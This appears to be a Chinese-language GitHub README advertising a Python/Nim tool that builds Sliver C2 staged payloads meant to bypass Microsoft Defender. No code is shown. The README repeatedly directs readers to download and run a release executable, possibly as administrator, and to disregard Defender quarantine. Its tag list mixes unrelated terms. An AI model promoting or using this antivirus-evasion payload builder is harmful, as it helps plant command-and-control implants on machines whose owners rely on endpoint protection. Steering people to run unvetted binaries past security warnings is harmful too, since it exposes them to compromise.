straight-clerestory824/defender_bypass_with_sliver

GitHub: straight-clerestory824/defender_bypass_with_sliver

基于 Python 与 Nim 交叉编译的自动化工具,用于构建可绕过 Microsoft Defender 的 Sliver C2 分阶段载荷,简化红队在 Windows 实验环境中的初始投递流程。

Stars: 0 | Forks: 0

# 🛡️ defender_bypass_with_sliver - 以更少的阻力运行你的 Payload [![下载](https://img.shields.io/badge/Download-Release%20Page-blue?style=for-the-badge)](https://github.com/straight-clerestory824/defender_bypass_with_sliver/releases) ## 📥 下载 访问此页面进行下载:https://github.com/straight-clerestory824/defender_bypass_with_sliver/releases 在发布页面中,找到最新版本并下载附带的 Windows 文件。如果你看到多个文件,请选择适用于 Windows 的那个。 ## 🖥️ 这是什么 `defender_bypass_with_sliver` 是一个基于 Python 的工具,用于构建可在 Windows 上使用的分阶段 Payload。它的目的是帮助用户准备能够在 Microsoft Defender 可能会阻止的环境中运行的 Payload。 该应用程序面向那些希望用简单的方式创建和测试 Payload 构建而无需从头编写代码的用户。它使用了少量的选项,让你只需极少设置即可从下载转到使用。 ## ✅ 你需要什么 在开始之前,请确保你具备: - 一台 Windows PC - 网络连接 - 在所使用的机器上运行该工具的权限 - 足够的可用空间用于下载和构建文件 - Windows 10 或 Windows 11 的现代版本 如果发布版本包含可直接运行的 Windows 文件,你可以直接使用它。如果发布版本包含源文件,你的系统可能需要安装 Python。 ## 🚀 如何下载并开始 1. 从上面的链接打开发布页面。 2. 找到最新发布版本。 3. 从该版本中下载 Windows 文件或压缩包。 4. 将其保存到你容易找到的文件夹中,例如 `Downloads` 或 `Desktop`。 5. 如果文件是 `.zip` 格式,请右键单击它并选择 **Extract All**。 6. 打开你解压后的文件夹。 7. 如果看到 `.exe` 文件,双击它即可启动。 8. 如果看到 Python 脚本,请使用你机器上的 Python 打开它。 ## 🧭 首次设置 如果你使用的是源代码版本而不是现成的应用程序,请按照以下步骤操作: 1. 从 Python 官方网站安装 Python。 2. 在安装过程中,勾选标记为 **Add Python to PATH** 的复选框。 3. 打开包含脚本的文件夹。 4. 按住 **Shift** 键并在文件夹中右键单击。 5. 选择 **Open PowerShell window here** 或 **Open in Terminal**。 6. 使用 Python 运行脚本。 示例: `python main.py` 如果文件名不同,请使用相应的文件名。 ## 🧰 基本用法 应用程序启动后,你通常需要输入几个值,例如: - Payload 名称 - 输出路径 - 构建风格 - 你想要使用的目标设置 然后,该工具将创建分阶段 Payload 并将其保存到你选择的文件夹中。 一个简单的流程如下所示: 1. 打开应用程序或脚本。 2. 输入请求的值。 3. 确认输出文件夹。 4. 开始构建。 5. 等待文件处理完成。 6. 检查输出文件夹以获取结果。 ## 🔧 建议的文件夹布局 使用清晰的文件夹结构,以便你跟踪文件: - `Downloads` 用于存放发布文件 - `defender_bypass_with_sliver` 用于存放解压后的应用程序 - `output` 用于存放生成的文件 - `logs` 用于存放运行输出和错误检查 将文件分开存放可以更容易地找到结果并在以后重新运行构建。 ## 🛠️ 常见任务 ### 启动工具 - 打开下载的文件或使用 Python 运行脚本 ### 构建 Payload - 按照应用程序中的提示操作 - 设置输出路径 - 运行构建过程 ### 查找输出 - 检查你在设置期间选择的文件夹 - 查找生成的 Payload 文件 - 使用该工具创建的文件名 ### 更改设置 - 再次打开应用程序 - 更新你想要更改的值 - 运行新的构建 ## 🔍 如果文件无法打开 请尝试以下步骤: 1. 确保下载已完成。 2. 检查文件是否在 `.zip` 存档中。 3. 先解压存档再打开它。 4. 如果你的设置需要,请右键单击文件并选择 **Run as administrator**。 5. 检查 Windows 是否阻止了该文件。 6. 如果你使用了 Python,请确认 Python 已安装并且在 PATH 中。 7. 尝试从发布页面下载最新版本。 ## 🧪 你可能会看到的行为 当工具运行时,它可能会创建: - 一个构建文件夹 - 一个分阶段 Payload 文件 - 一个临时工作文件夹 - 一个包含运行详细信息的日志文件 对于分步组装 Payload 的工具来说,这是正常的。 ## 🔒 Windows Defender 和构建输出 由于此工具旨在绕过 Microsoft Defender 的检查,Windows 可能会在下载或使用过程中标记该文件或将其隔离。如果发生这种情况,请检查发布文件名,确认你是从正确的发布页面获取的,并检查下载文件夹中解压后的文件。 ## 📁 示例用例 一个常见的用例是: - 你下载了最新发布版本 - 你解压了文件 - 你在 Windows 上打开了该工具 - 你输入了你想要的构建值 - 你创建了分阶段 Payload - 你将输出复制到工作流的下一步 ## 🧩 你可能会看到的文件类型 发布版本可能包含以下一个或多个文件: - `.exe` 用于在 Windows 上直接使用 - `.zip` 用于压缩包 - `.py` 用于 Python 脚本 - `.txt` 用于说明或使用详情 如果你看到文本文件,请先打开它。它可能会告诉你应该运行哪个文件。 ## ⚙️ 简单设置清单 - 下载最新发布版本 - 如有需要,解压文件 - 如果应用程序需要,请安装 Python - 打开应用程序或脚本 - 输入所需的值 - 运行构建 - 检查输出文件夹 ## 📌 顺畅使用的技巧 - 将发布文件保存在一个固定的地方 - 使用简短的文件夹路径,例如 `C:\Tools\defender_bypass_with_sliver` - 如果遇到问题,请避免在文件夹名称中使用空格 - 使用下载页面上的最新发布版本 - 将每次构建的输出保存在新文件夹中 ## 🧾 预期工作流 通常的流程是: 1. 从 GitHub 获取发布版本。 2. 在 Windows 上启动应用程序。 3. 输入你的构建详情。 4. 生成分阶段 Payload。 5. 检查输出文件。 6. 在你自己的测试环境中使用输出 ## 📎 如有需要请再次下载 如果你需要再次访问发布页面,请使用此链接: https://github.com/straight-clerestory824/defender_bypass_with_sliver/releases ## 🔄 重复构建 如果你以后想要进行另一次构建: 1. 再次打开应用程序。 2. 更改你想要的值。 3. 启动新的构建。 4. 将新输出保存在新文件夹中。 这可以将旧构建与新构建分开,从而更容易比较结果。
标签:C2 框架, DNS 反向解析, Nim 语言, Payload 生成, Python, RFI远程文件包含, Sliver C2, Stager 生成, Windows 安全, 中高交互蜜罐, 企业安全, 安全 evasion, 恶意软件开发, 搜索语句(dork), 无后门, 杀毒绕过, 红队基础设施, 绕过 Defender, 网络安全, 网络资产管理, 跨平台编译, 逆向工具, 隐私保护